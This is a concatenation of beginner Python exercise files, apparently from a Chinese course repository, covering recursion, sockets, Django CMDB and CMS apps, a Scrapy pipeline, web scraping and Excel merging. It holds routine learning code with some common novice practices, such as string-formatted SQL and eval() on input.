[2,3,5,10,15,16,18,22,26,30,32,35,41,42,43,55,56,66,67,69,72,76,82,83,88] # def cal(l,num,start,end): # if start<end: # mid = (end-start)//2 +start ##mid代表索引 # print(start,end) # # if l[mid]< num: # cal(l,num,mid+1,end) # elif l[mid]> num: # cal(l,num,start,mid-1) # else: # print('找到了',mid,l[mid]) # else: # print('没找到') # cal(l,58,0,len(l)-1) def cal(l,num,start,end): ''' :param l: 是列表 :param num: 要找的数字 :param start: 开始索引 :param end: 结束索引 :return: ''' if start<end: mid = (end-start)//2 +start ##mid代表索引 # print(start,end) if l[mid]< num: return cal(l,num,mid+1,end) elif l[mid]> num: return cal(l,num,start,mid-1) else: return mid,l[mid] else: return '没找到' print(cal(l,53,0,len(l)-1)) #l = [2,3,5,10,15,16,18,22,26,30,32,35,41,42,43,55,56,66,67,69,72,76,82,83,88] # def cal(l,num,start=0,end=None): # # if end is None:end = len(l)-1 # end = len(l)-1 if end is None else end # if start <= end: # mid = (end - start)//2 + start # if l[mid] > num : # return cal(l, num, start, mid-1) # elif l[mid] < num: # 13 24 # return cal(l,num,mid+1,end) # else: # return mid # else: # return None # l = [2,3,5,10,15,16,18,22,26,30,32,35,41,42,43,55,56,66,67,69,72,76,82,83,88] # print(cal(l,56)) # print(len(l))<file_sep>/auto_server/web/views.py from django.shortcuts import render from repository import models from django.http import JsonResponse def server(request): return render(request, 'server.html') # Create your views here. def server_json(request): table_config = [ { 'q': 'hostname', 'title': '主机名', }, { 'q': 'sn', 'title': '序列号', }, { 'q': 'os_platform', 'title': '系统', }, ] values = [] for item in table_config: values.append(item['q']) server_list = models.Server.objects.values(*values) print(server_list) response = { 'data_list': list(server_list), 'table_config': table_config } return JsonResponse(response) <file_sep>/day9/socket并发聊天/server.py # from socket import * # from multiprocessing import Process # server=socket() # server.setsockopt(SOL_SOCKET,SO_REUSEADDR,1) # server.bind(('127.0.0.1',8080)) # server.listen() # def talk(conn,client_addr): # while True: # try: # msg=conn.recv(1024) # if not msg:break # conn.send(msg.upper()) # except Exception: # break # if __name__ == '__main__': # while True: # conn,client_addr=server.accept() # p=Process(target=talk,args=(conn,client_addr)) # p.start() from socket import * from multiprocessing import Pool import os server=socket() server.setsockopt(SOL_SOCKET,SO_REUSEADDR,1) #地址可以重用 server.bind(('127.0.0.1',8080)) server.listen(5) def talk(conn): print('进程pid: %s' %os.getpid()) while True: try: msg=conn.recv(1024) if not msg:break conn.send(msg.upper()) except Exception: break if __name__ == '__main__': p=Pool(4) while True: conn,*_=server.accept() p.apply_async(talk,args=(conn,))<file_sep>/day18/s21/app01/my_md5.py import hashlib #动态加盐 def md5(user,pwd): md5obj=hashlib.md5(user.encode('utf-8')) md5obj.update(pwd.encode('utf-8'))# 使用md5算法的对象来操作字符串里面必须是bytes类型 return md5obj.hexdigest() <file_sep>/day6/8.多态.py # 在python中处处都是多态 # 多态 # java # class Person():pass # # alex = Person() # print(type(alex)) # Person # print(type('123')) # print(type(123)) # def func(Dog person): # pass # # func(ha2) # class Animal: # pass # # class Dog(Animal):pass # class Person(Animal):pass # # # def func(a): # pass # # func(alex) # func(ha2)<file_sep>/cmdb/auto_server - 7 - 资产信息入库/api/migrations/0001_initial.py # -*- coding: utf-8 -*- # Generated by Django 1.11 on 2018-10-20 03:53 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='AssetRecord', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('content', models.TextField(null=True)), ('create_at', models.DateTimeField(auto_now_add=True)), ], options={ 'verbose_name_plural': '资产记录表', }, ), migrations.CreateModel( name='BusinessUnit', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=64, unique=True, verbose_name='业务线')), ], options={ 'verbose_name_plural': '业务线表', }, ), migrations.CreateModel( name='Disk', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('slot', models.CharField(max_length=8, verbose_name='插槽位')), ('model', models.CharField(max_length=32, verbose_name='磁盘型号')), ('capacity', models.FloatField(verbose_name='磁盘容量GB')), ('pd_type', models.CharField(max_length=32, verbose_name='磁盘类型')), ], options={ 'verbose_name_plural': '硬盘表', }, ), migrations.CreateModel( name='ErrorLog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=16)), ('content', models.TextField()), ('create_at', models.DateTimeField(auto_now_add=True)), ], options={ 'verbose_name_plural': '错误日志表', }, ), migrations.CreateModel( name='IDC', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=32, verbose_name='机房')), ('floor', models.IntegerField(default=1, verbose_name='楼层')), ], options={ 'verbose_name_plural': '机房表', }, ), migrations.CreateModel( name='Memory', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('slot', models.CharField(max_length=32, verbose_name='插槽位')), ('manufacturer', models.CharField(blank=True, max_length=32, null=True, verbose_name='制造商')), ('model', models.CharField(max_length=64, verbose_name='型号')), ('capacity', models.FloatField(blank=True, null=True, verbose_name='容量')), ('sn', models.CharField(blank=True, max_length=64, null=True, verbose_name='内存SN号')), ('speed', models.CharField(blank=True, max_length=16, null=True, verbose_name='速度')), ], options={ 'verbose_name_plural': '内存表', }, ), migrations.CreateModel( name='NIC', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=128, verbose_name='网卡名称')), ('hwaddr', models.CharField(max_length=64, verbose_name='网卡mac地址')), ('netmask', models.CharField(max_length=64)), ('ipaddrs', models.CharField(max_length=256, verbose_name='ip地址')), ('up', models.BooleanField(default=False)), ], options={ 'verbose_name_plural': '网卡表', }, ), migrations.CreateModel( name='Server', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('device_status_id', models.IntegerField(choices=[(1, '上架'), (2, '在线'), (3, '离线'), (4, '下架')], default=1)), ('cabinet_num', models.CharField(blank=True, max_length=30, null=True, verbose_name='机柜号')), ('cabinet_order', models.CharField(blank=True, max_length=30, null=True, verbose_name='机柜中序号')), ('hostname', models.CharField(max_length=128, unique=True)), ('sn', models.CharField(db_index=True, max_length=64, verbose_name='SN号')), ('manufacturer', models.CharField(blank=True, max_length=64, null=True, verbose_name='制造商')), ('model', models.CharField(blank=True, max_length=64, null=True, verbose_name='型号')), ('os_platform', models.CharField(blank=True, max_length=16, null=True, verbose_name='系统')), ('os_version', models.CharField(blank=True, max_length=16, null=True, verbose_name='系统版本')), ('cpu_count', models.IntegerField(blank=True, null=True, verbose_name='CPU个数')), ('cpu_physical_count', models.IntegerField(blank=True, null=True, verbose_name='CPU物理个数')), ('cpu_model', models.CharField(blank=True, max_length=128, null=True, verbose_name='CPU型号')), ('latest_date', models.DateField(null=True)), ('create_at', models.DateTimeField(auto_now_add=True)), ('business_unit', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='api.BusinessUnit', verbose_name='属于的业务线')), ('idc', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='api.IDC', verbose_name='IDC机房')), ], options={ 'verbose_name_plural': '服务器表', }, ), migrations.AddField( model_name='nic', name='server', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='nic_list', to='api.Server'), ), migrations.AddField( model_name='memory', name='server', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='memory_list', to='api.Server'), ), migrations.AddField( model_name='errorlog', name='server', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='api.Server'), ), migrations.AddField( model_name='disk', name='server', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='disk_list', to='api.Server'), ), migrations.AddField( model_name='assetrecord', name='server', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='servers', to='api.Server'), ), ] <file_sep>/复习/内置函数和匿名函数.py # 一 内置函数 # # 1 输出 print # print(1,2,3,4,5,sep=';',end='| ') ##sep是以;分开每个数字,end是以|结尾的 #绝对值 # print(abs(-9)) #divmod返回商和余数 # print(divmod(9,4)) # print(pow(2,3,5)) #(2**3) 就是2的三次方,对5取余 8%5 #min最小值 # print(min(-1,0,3,4)) # # print(min(-1,0,3,4,key=abs)) ##算完绝对值之后,在返回最小值 #eval和exec # eval('print(123)') # exec('print(123)') # # print(eval('1+2-3*20/(2+3)'))##有返回值 # print(exec('1+2-3*20/(2+3)')) ##执行了但没有返回值 #format格式化显示,后面的数字代表距离 # print(format('test', '<2')) # print(format('test', '>20')) # print(format('test', '^40')) # ord字符串转数字 # print(ord('b')) ##repr用于%r格式化输出 # print(repr(1)) # print(1) # # print(repr('1')) #enumerate枚举 # ll=['a','b','c'] # for i,v in enumerate(ll): # print(i,v) #zip拉链 ret = zip([1, 2, 3, 4, 5], ('a', 'b', 'c', 'd'), (4, 5,0)) # 拉链方法 print(ret) for i in ret: print(i) #filter 重要 用于过滤,比如大于几的数字,或者偶数,奇数之类的 lst = [1, 4, 6, 7, 9, 12, 17] def func(num): if num % 2 == 0: return True filter(func, lst) ##分别把lst里面的值传给num,然后取出除2等于0的数字 for i in filter(func, lst): print(i) ##第二种方法 g = (i for i in lst if i%2 == 0) for i in g: print(i) #map求平方 def func(num): return num**2 for i in map(func,range(10)): print(i) # sorted排序(重要) # l = [1,-4,-2,3,-5,6,5] # # new_l = sorted(l,key=abs,reverse=True) ##按照绝对值大小,并且反序来排序的 # # print(new_l) # 二 匿名函数 # calc = lambda n:n**n # print(calc(2)) # # rs=lambda n,p:n**p # print(rs(2,3)) # for i in map(lambda num : num ** 2 ,range(10)):print (i) #打印1-9 ,9个数字的平方 # 现有两元组(('a'),('b')),(('c'),('d')),请使用python中匿名函数生成列表[{'a':'c'},{'b':'d'}] ret = map(lambda t:{t[0]:t[1]},zip((('a'),('b')),(('c'),('d')))) print(list(ret))<file_sep>/cmdb/auto_client - 7 - 资产信息入库/相关脚本/4.日志处理.py #!/usr/bin/python # -*- coding:utf-8 -*- import logging # 方式一: """ logging.basicConfig(filename='log1.log', format='%(asctime)s - %(name)s - %(levelname)s -%(module)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S %p', level=10) logging.info('info,asdfasdfasdfasdf') logging.error('error,asdfasdfasdf') """ # 方式二: file_handler = logging.FileHandler('xxxxxxxx.log', 'a', encoding='utf-8') file_handler.setFormatter(logging.Formatter(fmt="%(asctime)s - %(name)s - %(levelname)s: %(message)s")) logger = logging.Logger('s1', level=logging.INFO) logger.addHandler(file_handler) logger.info('1111') logger.error('2222') <file_sep>/day26/scrapy框架/pipelinepro/pipelinepro/pipelines.py # -*- coding: utf-8 -*- # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html import pymysql class PipelineproPipeline(object): # 作用:每当爬虫文件向管道提交一次item,该方法就会被调用一次。item参数就是接受到爬虫文件给提交过来的item对象 # 该方法只有在开始爬虫的时候被调用一次 fp = None def open_spider(self, spider): print('开始爬虫') self.fp = open('./qiubai_data.txt', 'w', encoding='utf-8') def process_item(self, item, spider): author = item['author'] content = item['content'] self.fp.write(author + ":" + content) return item # 该方法只有在爬虫结束后被调用一次 def close_spider(self, spider): print('爬虫结束') self.fp.close() # 这个是写入mysql数据库 的 create table qiubai (author varchar(100),content varchar(9999)); 创建表 class MyPipeline(object): conn = None cursor = None # 作用:每当爬虫文件向管道提交一次item,该方法就会被调用一次。item参数就是接受到爬虫文件给提交过来的item对象 def open_spider(self, spider): self.conn = pymysql.Connect(host="127.0.0.1", port=3306, db="scrapydb", charset="utf8", user="root",password="123") self.cursor = self.conn.cursor() print('mysql') def process_item(self, item, spider): author = item['author'] content = item['content'] sql = "insert into qiubai values('%s','%s')" % (author, content) try: self.cursor.execute(sql) self.conn.commit() except Exception as e: print(e) self.conn.rollback() return item <file_sep>/day2/03 list.py l = ['老男孩', 'alex', 'wusir', 'taibai', 'ritian'] # #增 # #append 在组后增加 # l.append('葫芦') # print (l) # # #insert插入 # # l.insert(1,'bob') ##在索引是1的地方插入 # print (l) # # #迭代添加 # # l.extend('alex') # print (l) # #删除 # #pop 有返回值,按照索引删除 # # print (l.pop(0)) # print (l) # #remove # l.remove('alex') # print (l) # # #clear 清空列表 # # l.clear() # # print (l) # # #del 内存级别删除列表 # # # del l # # print (l) # # #按索引删除 # # del l[1] # # print(l) # # #切片删除 # # del l[1:3] # print (l) #改 #按照索引去改 # print (l[2]) # l[2]= 'huningfei' # print (l) # #按照切片去改 # l[:2] = 'abc' ##把索引是0和1的全部改成了abc # print (l) # l[1:3] = [111,222,333] # print (l) # #查询 # #按照索引去查询,按照切片去查下 # for i in l: # print (i) # # #其他办法 # a = [8,7,8,3,3,5,3,1,2] # #count 计数 # print (a.count(8)) # # #len # print (len(a)) # # #sort 从小到大排序 a.sort() print (a) a.sort(reverse=True) ##从大到小 print (a) b = ['a','b','e','e','g'] #reverse ##倒过来排序 b.reverse() print (b) #联系 # l1 = [1, 2, 'alexdfdf', 'wusir',['oldboy', 'ritian', 10], 'taibai'] # # # # # l1[2]='ALEX' # # # print (l1[2]) # # l1[2] = l1[2].upper() # # print (l1) # # l1[-2].append('女神') # print (l1[-2]) # # l1[-2][1] = (l1[-2][1].capitalize()) # print (l1) # # l1[-2][2]=int(l1[-2][2]) + 90 # print (l1)<file_sep>/day21/CMS/fault_reporting/urls.py from django.conf.urls import url from fault_reporting import views urlpatterns = [ # 第一版, 特别low版 # url('^lob/(.*)/$', views.lob), # url('^tag/(.*)/$', views.tag), # url('^archive/(.*)/$', views.archive), # # # 第二版: 三合一 # url(r'(lob|tag|archive)/(.*)/$', views.sanhe1), # sanhe1(request, *args) args[0]=="lob" # 第三版: 四合一 url(r'(lob|tag|archive)/(.*)/$', views.index), # index(request, "lob", "游戏") # 首页 url('^$', views.index), # index(request) # 故障总结详情页面 url(r'^report/(\d+)/$', views.report_detail), url(r'^updown/$', views.updown), # 点赞 url(r'^comment/$', views.comment), # 评论 # 个人中心页面 url(r'^info/$', views.info), # 发表故障 url(r'^add-report/$', views.add_report), # 编辑故障总结 url(r'^edit-report/(\d+)/$', views.edit_report), # 删除故障总结 url(r'^del-report/(\d+)/$', views.del_report), #富文本编辑器 url(r'^upload-img/$', views.upload_img), ] <file_sep>/excle.py # # -*- coding: utf-8 -*- # # # 将多个Excel文件合并成一个 # import xlrd # import xlsxwriter # # # # 打开一个excel文件 # def open_xls(file): # fh = xlrd.open_workbook(file) # return fh # # # # 获取excel中所有的sheet表 # def getsheet(fh): # return fh.sheets() # # # # 获取sheet表的行数 # def getnrows(fh, sheet): # table = fh.sheets()[sheet] # return table.nrows # # # # 读取文件内容并返回行内容 # def getFilect(file, shnum): # fh = open_xls(file) # table = fh.sheets()[shnum] # num = table.nrows # for row in range(num): # rdata = table.row_values(row) # datavalue.append(rdata) # return datavalue # # # # 获取sheet表的个数 # def getshnum(fh): # x = 0 # sh = getsheet(fh) # for sheet in sh: # x += 1 # return x # # # if __name__ == '__main__': # # 定义要合并的excel文件列表 # allxls = ['D:/test/a.xls', 'D:/test/b.xls'] # # 存储所有读取的结果 # datavalue = [] # for fl in allxls: # fh = open_xls(fl) # x = getshnum(fh) # for shnum in range(x): # print("正在读取文件:" + str(fl) + "的第" + str(shnum) + "个sheet表的内容...") # rvalue = getFilect(fl, shnum) # # 定义最终合并后生成的新文件 # endfile = 'D:/test/excel3.xlsx' # wb1 = xlsxwriter.Workbook(endfile) # # 创建一个sheet工作对象 # ws = wb1.add_worksheet() # for a in range(len(rvalue)): # for b in range(len(rvalue[a])): # c = rvalue[a][b] # ws.write(a, b, c) # wb1.close() # print("文件合并完成") import glob # 需要用pip先安装 from numpy import * # 请提前在CMD下安装完毕,pip install numpy import xlrd # 同上 import xlwt # 同上 import time location = "D:/file/" # 你需要合并该目录下excel文件的指定的文件夹 date = "20171016" # 不需要,笔者在这里使用此参数作为合并后的excel文件名称 header = ["学校", "年级","班级","用户key","用户编号","用户姓名","电子邮箱","身份证号","生日","性别","绑定设备号"] # 表头,请根据实际情况制定 fileList = [] for fileName in glob.glob(location + "*.xls"): fileList.append(fileName) # 读取目标文件夹所有xls格式文件名称,存入fileList print("在该目录下有%d个xls文件" % len(fileList)) fileNum = len(fileList) matrix = [None] * fileNum # 实现读写数据 for i in range(fileNum): fileName = fileList[i] workBook = xlrd.open_workbook(fileName) try: sheet = workBook.sheet_by_index(0) except Exception as e: print(e) nRows = sheet.nrows matrix[i] = [0] * (nRows - 1) nCols = sheet.ncols for m in range(nRows - 1): matrix[i][m] = ["0"] * nCols for j in range(1, nRows): for k in range(nCols): matrix[i][j - 1][k] = sheet.cell(j, k).value fileName = xlwt.Workbook() sheet = fileName.add_sheet("combine") for i in range(len(header)): sheet.write(0, i, header[i]) rowIndex = 1 for fileIndex in range(fileNum): for j in range(len(matrix[fileIndex])): for colIndex in range(len(matrix[fileIndex][j])): sheet.write(rowIndex, colIndex, matrix[fileIndex][j][colIndex]) rowIndex += 1 print("已将%d个文件合并完成" % fileNum) fileName.save(location + date + ".xls") # fileName.save("D:\python21\python\.txt") <file_sep>/day19/form/templates/edit_book.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>编辑书籍</title> <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.css" rel="stylesheet"> </head> <body> <div class="container"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <h1>编辑书籍</h1> <form action="" method="post" novalidate autocomplete="off"> {% for field in form_obj %} <div class="form-group"> <label for="{{ field.id_for_label }}">{{ field.label }}</label> {{ field }} <p>{{ field.errors.0 }}</p> </div> {% endfor %} <input type="submit" class="btn btn-success"> </form> </div> </div> </div> </body> </html><file_sep>/day18/s21/s21/urls.py """s21 URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from app01 import views urlpatterns = [ url(r'^admin/', admin.site.urls), # 关于用户的url url(r'^login', views.login), url(r'^register_user/', views.register_user), url(r'^show_user/$', views.show_user), url(r'^del_user/$', views.del_user), url(r'^edit_user/$', views.edit_user), url(r'^add_user/$', views.add_user), url(r'^logout',views.logout), # 关于主机管理的url url(r'^show_host/$',views.show_host), # 添加主机 url(r'^add_host/$',views.add_host, name="add_host"), # 编辑主机 url(r'^edit_host/(?P<pk>\d+)$',views.edit_host,name="edit_host"), # 删除主机 url(r'^del_host/(?P<pk>\d+)$', views.del_host, name="del_host"), # 关于业务的操作 url(r'^show_service/$', views.show_service), # # 添加业务 url(r'^add_service/$', views.add_service, name="add_service"), # # 编辑业务 url(r'^edit_service/(?P<pk>\d+)$', views.edit_service, name="edit_service"), # # 删除业务 url(r'^del_service/(?P<pk>\d+)$', views.del_service, name="del_service"), # 用户业务关系 url(r'^user_service_list/$',views.user_service_list), #添加 # url(r'^add_user_service/$', views.add_user_service), #编辑 url(r'^edit_user_service/(?P<pk>\d+)$', views.edit_user_service), ] <file_sep>/deploy/web/views/user.py from django.shortcuts import render,HttpResponse,redirect from web.forms.user import UserModelForm from web import models from web.utils.pager import Pagination from web.utils.urls import memory_reverse def user_list(request): """ 用户列表 :param request: :return: """ # 获取用户传过来的要查看的页码,如果没有,默认是1 page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.UserInfo.objects.all().count() # 数据库中获取即可 pager = Pagination(page,total_count,request.path_info) depart_queryset = models.UserInfo.objects.all()[pager.start :pager.end] return render(request,'user_list.html',{'depart_queryset':depart_queryset,'pager':pager}) def user_add(request): """ 添加 用户 :param request: :return: """ if request.method == 'GET': form = UserModelForm() return render(request, 'form.html', {'form':form}) form = UserModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.save() return redirect(memory_reverse(request,'user_list')) return render(request, 'form.html', {'form': form}) def user_edit(request,nid): """ 编辑 用户 :param request: :param nid: 当前要编辑的部门ID :return: """ obj = models.UserInfo.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = UserModelForm(instance=obj) return render(request,'form.html',{'form':form}) # 带默认值 form = UserModelForm(data=request.POST,instance=obj) if form.is_valid(): print('写入数据库') form.save() return redirect(memory_reverse(request,'user_list')) return render(request, 'form.html', {'form': form}) def user_del(request,nid): """ 删除 用户 :param request: :param nid: :return: """ origin = memory_reverse(request,'user_list') if request.method == 'GET': return render(request, 'delete.html', {'cancel': origin}) models.UserInfo.objects.filter(id=nid).delete() return redirect(origin)<file_sep>/day8/server.py import socket sk=socket.socket() #实例化一个对象 sk.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)#端口可以重用 sk.bind(('127.0.0.1',9100)) sk.listen()#监听 while True: conn,addr=sk.accept() #阻塞,三次握手完毕 while True: inp=input('请输入你要发送的消息:') conn.send(inp.encode('utf-8')) if inp == 'q': break ret=conn.recv(1024).decode('utf-8') if ret == 'q': break print(ret) conn.close() sk.close()<file_sep>/day4/优秀的作业/优秀的作业/张晨亮/day4.py # -*- encoding:utf-8 -*- import sys import os #生成器 def user_list_g(): with open('user_list.txt',encoding='utf-8',mode='r') as f: data =[eval(i) for i in f] for i in data: yield i #用户状态 login_status = False #装饰器 def zsq(args): def inner(): if login_status: args() else: print("请您先登录!!".center(60,'-')) return inner # 登录 def login(): print("提示,账号:123 密码:123".center(60,'!')) global login_status if login_status: print("您已登录!") else: count = 3 while count: l_g = user_list_g() luser =input("请输入账号:") lpass = input("请输入密码:") for i in l_g: if luser == i.get('username') and lpass == i.get('passwd'): login_status = True if login_status: print("登录成功!".center(60,'-')) break else: print("账号密码错误!") count -=1 # 读文件 @zsq def select1(): with open('list', 'r', encoding='utf-8') as f: line = f.readlines() for i in line: print(i) # 查 @zsq def select(): ''' 函数查询 :return: ''' print("功能提示".center(60,'~')) msg = ''' 1.select name,age from staff_table where age > 22 2.select * from staff_table where dept = "IT" 3.select * from staff_table where enroll_date like "133" ''' print(msg) print("功能提示".center(60,'~')) user_input = input('SQL>>>:').strip() user_inupt1 = user_input.split(' ') if user_input == 'select name,age from staff_table where age > %s' % (user_inupt1[7]): with open('list', 'r+', encoding='utf-8') as f: list1 = [] count = 0 for line in f: i = line.strip().split(',') if i[2] > user_inupt1[7]: list1.append(i) for s in list1: count = count + 1 for j in list1: print(j) elif user_input == ('select * from staff_table where dept = %s' % (user_inupt1[7])): with open('list', 'r', encoding='utf-8') as f: list2 = [] count = 0 for line in f: i1 = line.strip().split(',') if i1[4] == eval(user_inupt1[7]): list2.append(i1) count = count + 1 for j1 in list2: print(j1) elif user_input == ('select * from staff_table where enroll_date like %s' % (user_inupt1[7])): with open('list', 'r+', encoding='utf-8') as f: list3 = [] list4 = [] count = 0 for line in f: i = line.strip().split(',') list3.append(i) for j in list3: m = j[4] if m[0] == eval(user_inupt1[7]): list4.append(j) for s in list4: count = count + 1 if count < 1: print('没有找到类似条目!!!') pass else: pass for j in list4: print(j) return () # 曾 @zsq def alter(): ''' 添加函数 :return: ''' print("功能提示".center(60,'^')) msg = ''' 1)命令如:zs,24,13651054601,HR, 格式: 名字,年龄,电话,职业, (以逗号分隔!!) ''' print(msg) print("功能提示".center(60, '^')) user_input = input('SQL>>>:') user_input1 = user_input.split(',') with open('list', 'r+', encoding='utf-8') as f: lists = [] for line in f: s2 = line.strip().split(',') m = s2[3] lists.append(m) if user_input1[2] in lists: print('这条记录已经存在!!!') main() else: my_index = str(len(lists) + 1) user_input1.insert(0, my_index) user_input1 = ','.join(user_input1) f.flush() f.write(user_input1) f.write('\n') f.close() print("记录添加完成!!!", '\n') return () # 删 @zsq def delect(): ''' 删除函数 :return: ''' print("功能提示".center(60,'*')) print('-----请输入删除命令例如:输入用户ID 即可以从list中删除!') msg = ''' 1)按1删除、直接删除ID即可 2)按2或者q退出 ''' print(msg) print("功能提示".center(60, '*')) user_input = input('SQL>>>:') if user_input == '1': print('现有的用户为:') select1() print('\n') user_input1 = input('请输入需要删除的用户ID:') user_input2 = user_input1[0] f = open('list', 'r+', encoding='utf-8') f1 = open('new_list', 'w+', encoding='utf-8') for line in f: i = line.strip().split(',') i1 = i[0] if user_input2 != i1: i = ','.join(i) f1.write(i) f1.write('\n') else: continue f.close() f1.close() os.remove('list') os.rename('new_list', 'list') print('\n') select1() elif user_input == '2' or 'q': sys.exit() return # 更新 @zsq def update(): ''' 更新函数 :return: ''' msg = ''' 1)这里第一个等号按照没有空格的格式划分 2)命令范例:UPDATE staff_table SET dept="INS" where dept = "HR" ''' print(msg) user_choice_input = input('SQL>>>:') user_choice_input1 = user_choice_input.split(' ') dept = user_choice_input1[3].split('=') dept_new = dept[1] dept_old = user_choice_input1[7] if user_choice_input == ('UPDATE staff_table SET dept=%s where dept = %s' % (dept_new, dept_old)): dept_new1 = eval(dept_new) dept_old1 = eval(dept_old) f = open('list', 'r+', encoding='utf-8') f1 = open('new_list', 'w+', encoding='utf-8') for line in f: i = line.strip().split(',') dept_change = i[4] if dept_change == dept_old1: i[4] = eval(dept_new) i = ','.join(i) f1.write(i) f1.write('\n') f.close() f1.close() os.remove('list') os.rename('new_list', 'list') print('\n') select1() pass return () # 交互 def main(): ''' 交互 :return: ''' print('员工信息选择'.center(60,'*')) msg = ''' 1、登录 2、查询 3、添加 4、删除 5、更新 6、退出 ''' exit_fiag = False while not exit_fiag: print(msg) user_choice = input('请选择>>>:').strip() if user_choice == '2': select() elif user_choice == '3': alter() elif user_choice == '4': delect() elif user_choice == '5': update() elif user_choice == '6': sys.exit() elif user_choice == '1': login() else: print('输入错误!,请重新输入!!!') main() main()<file_sep>/day8/异常处理.py # s1 = 'hello' # try: # int(s1) # except ValueError as e: # print(e) #多分枝 # s1 = 'hello' # try: # int(s1) # except IndexError as e: # print(e) # except KeyError as e: # print(e) # except ValueError as e: # print(e) #万能异常 # # # s1 = 'hello' # try: # int(s1) # except Exception as e: # print(e) # try: # f=open('a','w') # l=[1] # num=int(input('num:')) # l[num] # except ValueError:print('请输入一个数字') # except IndexError:print('你要找的项目不存在') # except Exception as e:print(e) # else:print('执行elses')# 如果try语句中的代码都顺利的执行了,没有报错,那么执行else中的代码 # finally: ##(无论如何都会执行finally) # print('执行了finally') # f.close() #重用的处理异常结构 # try: # pass #可能有问题的代码 # except ValueError: # 能预料到的错误 # pass # except Exception as e:print(e) # 能处理错有的异常 # else:pass # try中的代码没有错误的时候执行 # finally:pass #主动触发异常 # try: # raise TypeError('类型错误') # except Exception as e: # print(e) #断言 assert assert 1==1 print('ok') # assert 1==2 # print('error') <file_sep>/复习/递归和二分查找算法.py # 例子算年龄 问你a几岁,a比b大2岁,b比c大2岁,c是40岁,问你a几岁? def age(n): if n == 3: return 40 else: return age(n+1)+2 print(age(1)) #二分算法 l = [2,3,5,10,15,16,18,22,26,30,32,35,41,42,43,55,56,66,67,69,72,76,82,83,88] def cal(l, num, start, end): ''' :param l: 是列表 :param num: 要找的数字 :param start: 开始索引 :param end: 结束索引 :return: ''' if start < end: mid = (end - start) // 2 + start ##mid代表索引 # print(start,end) if l[mid] < num: return cal(l, num, mid + 1, end) elif l[mid] > num: return cal(l, num, start, mid - 1) else: return mid, l[mid] else: return '没找到' print(cal(l, 55, 0, len(l) - 1))<file_sep>/day25/xpath爬取方法.py # 需求,爬取笑话网中的段子内容和作者 from lxml import etree import requests url = 'https://www.xiaohua.com/duanzi/' headers = { #对UA进行重写操作(伪装) 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } response = requests.get(url=url,headers=headers) page_text = response.text # 实例化一个etree对象,并且将页面数据放到etree tree = etree.HTML(page_text) div_list = tree.xpath('//div[@class="content-left"]/div[@class="one-cont"]') print(div_list) # 写入到文件 fp = open('./xiaohua.txt', 'w', encoding='utf-8') for div in div_list: # print(div) author = div.xpath('//div[@class="one-cont-font clearfix"]//i/text()')[0] # print(author) content = div.xpath('./p/a//text()')[0] print(content) fp.write(author + ":" + content + "\n\n") fp.close() <file_sep>/day8/ftp作业/server_login.py import hashlib import configparser import socket import struct import json def register_login(): # global conn # global user_pwd # while True: config = configparser.ConfigParser() config.read('userinfo') user = (config.sections()) for i in user: if i == username and config[i]['passwd']== pwd: conn.send('登录成功'.encode('utf-8')) else: conn.send('你输入的用户名或密码错误'.encode('utf-8')) sk=socket.socket() sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sk.bind(('127.0.0.1', 8090)) sk.listen() while True: conn,addr=sk.accept() print('连接成功') while True: user_pwd=json.loads(conn.recv(1024).decode('utf-8')) username=user_pwd[0] pwd=<PASSWORD>[1] print(user_pwd[0],user_pwd[1]) conn.close() sk.close() # def init_socker(): # sk=socket.socket() # sk.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) # sk.bind(('127.0.0.1',8090)) # sk.listen() # while True: # print('>>>等待客户端连接...') # conn,addr=sk.accept() # print('连接成功') # while True: # print('------等待接收') # ret=conn.recv(1024).decode('utf-8')#接受到一个字符串 # user_pwd=json.load(ret) # conn.close() 